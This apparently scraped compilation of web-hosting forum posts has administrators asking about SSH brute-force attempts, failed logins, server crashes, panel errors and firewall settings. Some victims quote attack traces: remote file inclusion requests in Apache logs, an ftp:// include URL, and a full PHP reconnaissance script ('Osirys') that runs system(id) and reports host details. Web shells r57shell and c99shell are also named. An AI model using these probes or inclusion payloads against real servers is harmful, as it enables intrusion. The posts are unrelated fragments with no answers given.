I keep seeing sa login failure on Event viewer Application log for MS SQL 2005. I'm tired of blocking off the failed attempt ip. A huge portion of them seem to come from China and Estern Euro. Should i just block off those region? Is there a better way for securing SQL2005?
View 1 RepliesI have a dedicated RHEL server with cPanel and my server loads spikes about +0.4 (out of 2.0) for about 30 mins every 4-6 hours or so. My regular server load is 0.01, because there is barely any traffic on the server yet, but by looking at my top processes in WHM, I can see that the processes that are spiking the Server Load when it is high, is something like:
sshd: [priv] root
sshd: [priv] root
sshd: [priv] root
sshd: [accepted]
sshd: [priv] games
sshd: [priv] news
sshd: [priv] root
sshd: [priv] root
sshd: [accepted]
...something along these lines. And a lot of times there are 10-20 of these sshd processes at one time.
My server is managed and my dedicated server engineer said it was probably a bot trying passwords. He took one of the IP's, said it was from Taiwan, and blocked that IP in iptables.
However, this is still happening constantly with different IP's. Is there a way to prevent this from happening? I'm the only person (and my host) who should be able to login to my server using SSH... however, I don't have a static IP and I work from multiple locations, so only allowing certain IP's won't work for me.
First off, is this normal? Or am I being attacked or what? What can I do to remedy this? It seems the bots haven't successfully logged in, but they are spiking my server load which is NOT what I want.
I have not been able to login to my cPanel from my desktop which runs WinXP service Pack3. Both Firefox and Internet Explorer returns the following error message
Login Attempt Failed!
Also, I am unable to connect using Filezilla Client.
However, I am able to connect to the same cPanel on my colleague's desktop which runs WinXP service Pack3 using Firefox browser or IE. We both share the same internet modem.
- I have cleared all the cookies and private data on my desktop. Still the problem persist.
- I changed to a different user on my desktop, but still could not login.
- I changed my desktop IP address but still I could not log in.
I use DSLinux from within Innotek Virtual Box and I was able to login to the same cPanel with the same details that were rejected under WinXP.
Please anyone with a solution should please advise me on what to do. Thanks in advance.
It is not convenient going to my colleagues desk to access my cPanel.
I have in my possession a new server which is running cPanel. For some unknown reason it keeps crashing about every 4-6 hours where I must get a remote reboot done.
Its starting to annoy me that I'm unable connect to anything. What I suspect is high disk red/write. As what I'm finding is over 10k blocks being written per second with only 300 being read per second. I also am not seeing any bandwidth out/in usage being high.
I am wanting to get access to 'top -c' for a period of 48/72 hours.
Now I have found the following
Code:
top -c -b -d 15 > top.txt
What this does is every 15 seconds add reply 'top -c' to top.txt
Now I can make this into a shell script then put it into the background and exit SSH while leaving it running.
Now the question is will this use much usage/server load over the 48/72hrs, it will be checking 4 times every minute.
I thought i'd just post a quick message on here to see what you guys make of this situation. It's only happened with what, the past hour or so, but when i check the visitor logs on our website it seems that a "YouMonitor.us" is constantly spamming connections to the website over 1 second intervals (even less than that in some cases).
Furthermore, its coming in from different IP address's all the time and therefore its inappropriate to block everyone as they seem to just constantly change.
Today i was informed that some of Apache instances are vulnerable for serving content while client is constantly pressing F5 button in browsers - once is pressed CPU load is increasing, page became slow etc. (it's dynamic content served by back-end Tomcats). In the same time i see errors with connection between Apache and Tomcats' instances.
Is there any good way to protect Apache against it ?
My server is constantly crashing (halting to dead) and needing reboot literally every few hours. I cannot trace the cause of this whatsoever. Please help out.
CPU/Memory/MySQL Usage shows no accounts in red or yellow zone ....
I was having issues with what I would like to think as power.
Now, I was wondering if there are any SQL database benchmarks, or something else I can run on the system for a given period of time, that will let me see if I'm still having those power issues.
We first noticed the issue on July 19th, Backups were taking a while to transfer from our own servers, and we were getting tickets from clients asking why this was happening. At the same time, it took about 4-5 minutes to log into the backup console. Issue seemed to correct itself so that backups were possible, and we assumed that scott would be aware of it and would work to resolve it.
Again on the 29th it slowed completely again. We immediately dispatched an email to their support email asking whats up, gave them detailed information such as access to the script and the output so he could monitor it.
The same day a few hours later we got a response that he would run the script and monitor it.
On the 31st, after not getting an update I asked what was going on. He said he ran the script, it seemed to stall for long periods of time and he would know more in the afternoon.
After not getting an update for ~5 days I asked what was going on and I expressed that i was not happy with the lack of communication/updates ont he situation. He updated me later that day saying that we weren't the only ones being affected. Fair enough, he is working on it. Thats all I wanted to hear.
Now ever since that email I received on the 5th (AUG) it has been up and down and all over the place.
After seeing him post on the forums I sent him a PM (10th August), summed up it was basically saying I had an issue, and I need it fixed. I figured since the PM system is usually pretty good at not losing them that he would see it and respond accordingly, that way there was no chance of it being lost from point A to point B as an email.
Well to this day, no response nor resolution.
I really have exhausted all points of communication, and I want to make it clear that I am not bashing them, when it works it's great. But maybe someone else affected can provide more insight..
Not sure why, but for some reason lately our Plesk installation randomly sends us notification emails about alarm level changes which go from Green to yellow, yellow to red, then goes back to normal over time. No changes were made on the server for these constant changes and emails to occur. We have a customer who also has the same issue.. Both focus primarily on nginx with little to no usage of apache.
View 2 Replies View RelatedThis problem has been reported before Plesk Panel 11. What's the current solution for this problem? I've got this problem since I upgraded to Plesk Panel 11.09.
I'm getting spammed with emails like:
Server health parameter "Services > Apache memory usage" changed its status from "green" to "yellow". Click to expand...
I had Plesk 10 installed on my openSUSE system (was a low version, maybe 11 or less) and then decided to upgrade to 11.5. So I did distribution upgrades to openSUSE 12.3 and everything went smoothly, except for some services like mysql and php. So I used Plesk autoinstaller to fix the php error and edited an outdated line in mysql configuration and both services ran smoothly!
Then I downloaded Plesk autoinstaller and ran the autoinstaller, but was surprised by this error message:
===> Checking for previous installation ... found.
ERR (3) [panel]: Error during product key mode determination, details: Unable to connect to database: ; trace: #0 /usr/local/psa/admin/plib/functions.php(2821): isPpaKeyRequired()
#1 /usr/local/psa/admin/plib/common_func.php3(11): require_once('/usr/local/psa/...')
#2 /usr/local/psa/admin/plib/api-common/cu.php(5): require_once('/usr/local/psa/...')
#3 /usr/local/psa/admin/sbin/httpdmng(8): include_once('/usr/local/psa/...')
#4 (main)
Unable to connect to database:
- My MySQL version is: 5.5.33 openSUSE package
- I did run mysql_upgrade with my admin username and password (password from: /etc/psa/.psa.shadow) and it worked successfully and fixed all of the errors, I did so after running the auto installer first, but then ran the installer again and the problem was still there
- I can access my web page, but it still doesn't connect to MySQL either.
I believe this is a problem with MySQL, but how can I make sure or detect what exactly the problem is
I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.
Does this belong to anyone??? Nslookup/dig reveals nothing.
This is my /var/log/messages
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - !POSSIBLE BREAK-IN ATTEMPT
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url]
[url]
[url]
[url]
[url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
I have started seeing the following error in the Event Viewer every day:
"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."
The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?
see the log entries below:
LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
Just got a new additional VPS with WHM/cPanel.
Browse to www.mydomain.com/webmail and get login box > login accepted and taken to Horde/Squirrelmail choice screen > choose Squirrelmail and get login box ... login not accepted! > Retry and choose Horde ... login not accepted!
The login is correct and the results are the same when logging in as root, or through /cPanel or /Webmail.
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?
Is this stuff largely ignored?
Is anyone else doing this?
Is there an easier way?
A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?
The account has been susspended for the time being.
Code:
Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser
] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website setup last October.
The content of the directory:
Quote:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm
File content:
Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__
Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
whenever I attempt to install RoR, libsafe stops me, how do I diable libsafe so I can install RoR, then re-enable libsafe.
[root@server1 ~]# gem install rails --include-dependencies
Libsafe version 2.0.16
Detected an attempt to write across stack boundary.
Terminating /usr/bin/ruby-bin.
uid=0 euid=0 pid=20960
Call stack:
0x4c0e6871 /lib/libsafe.so.2.0.16
0x4c0e6c5d /lib/libsafe.so.2.0.16
0x80549b8 /usr/bin/ruby-bin
0x8054a52 /usr/bin/ruby-bin
0x80556af /usr/bin/ruby-bin .....
one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
Currently having a problem with proftpd on my centos plesk 8.1 server.
During large uploads, lets say around 10 MB the FTP connection fails within 5 minutes or so saying:
"A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."
I have asked for help from my server provider but they have tried and are now unable to help.
I currently have the APF firewall in my server.
Has anyone experienced this?
Below is the APF config file that i currently have & the proftpd config files that i have, if anyone can help it would be really really appreciated
APF CONFIG:
Code:
#!/bin/sh
#
# APF 0.9.6 [apf@r-fx.org]
#
# NOTE: This file should be edited with word/line wrapping off,
# if your using pico please start it with the -w switch
# (e.g: pico -w filename)
#
##
# [Devel Mode]
# !!! Do not leave set to (1) !!!
# When set to enabled; 5 minute cronjob is set to stop the firewall. Set
# this mode off (0) when firewall determined to be operating as desired.
##
# Set firewall cronjob (devel mode)
# 1 = enabled / 0 = disabled
DEVEL_MODE="0"
##
# [Main]
##
# The installation path of APF; this can be changed but it has not
# been tested what would happen.
INSTALL_PATH="/etc/apf"
# Untrusted Network interface(s); all traffic on defined interface will be
# subject to all firewall rules. This should be your internet exposed
# interfaces. Only one interface is accepted for each value.
# NOTE: The interfacing structure is being worked towards support of MASQ/NAT
IFACE_IN="eth0"
IFACE_OUT="eth0"
# Trusted Network interface(s); all traffic on defined interface(s) will by-pass
# ALL firewall rules, format is white space or comma seperated list.
IFACE_TRUSTED=""
# Enable virtual network subsystem; creats independent policy ruleset for each
# ip on a system (pulls data from 'ip addr list') to /etc/apf/vnet/ip.rules
# Template is located in the vnet/ folder for rule files. This feature can
# reduce apf start/stop performance and is not recommend for systems with more
# than 255 (/24) ip's. [0 = Disabled / 1 = Enabled]
SET_VNET="0"
# Support Monolithic kernel builds [no LKM's]. This mode of operation is
# not really supported and you use at your own risk.
SET_MONOKERN="0"
# Verifies that all inbound traffic is sourced from a defined local gateway MAC
# address. All other traffic that does not match this source MAC address will be
# rejected as untrusted traffic. It is quite trivial to forge a MAC address and as
# such this feature executes NO default accept policy against this MAC address.
VF_LGATE=""
# Verifies that the IF and IFACE_TRUSTED interfaces are actually routed (/sbin/route)
# to something. If not then chances are APF will not start properly if at all.
VF_ROUTE="1"
# Verifies that crond service is running when DEVEL_MODE=1; if not then APF will not
# try to load as if lock-up occures no cron service to flush firewall
VF_CROND="1"
# Verifies that the current system uptime is greater than this value before APF
# can activate. This is to prevent on-boot lockup issues or delays due to excessive
# amount of firewall rules. Value is in seconds; should you wish to disable this
# feature, simply set VF_UTIME to 0 value. !! NOTE: APF WILL NOT START ON IT's OWN;
# IT WILL EXIT WITH FATAL ERROR BELOW SET UPTIME !!
VF_UTIME="0"
##
# [Packet Filtering/Handling]
##
# How to handle TCP packet filtering?
#
# RESET (sends a tcp-reset; TCP/IP default)
# DROP (drop the packet; stealth ?)
# REJECT (reject the packet)
TCP_STOP="DROP"
# How to handle UDP packet filtering?
#
# RESET (sends a icmp-port-unreachable; TCP/IP default)
# DROP (drop the packet; stealth ?)
# REJECT (reject the packet)
# PROHIBIT (send an icmp-host-prohibited)
UDP_STOP="DROP"
# How to handle all other packet filtering? (icmp,arp,igmp)
#
# DROP (drop the packet)
# REJECT (reject the packet)
DSTOP="DROP"
# The sanity options control the way packets are scrutinized as
# they flow through the firewall. The main PKT_SANITY option is a
# top level toggle for all SANITY options and provides general
# packet flag sanity as a pre-scrub for the other sanity options
PKT_SANITY="1"
# Block any packets that do not conform as VALID; this feature
# is safe for most but some may experience protocol issues with
# broken remote clients
PKT_SANITY_INV="0"
Just an FYI - we have been monitoring some attempts from europe. Here is a file that they were trying to include using a hole in PHPCoin's URL handler:
[URL removed] stringa.txt
The attempt was coming from linux.htd-information.dk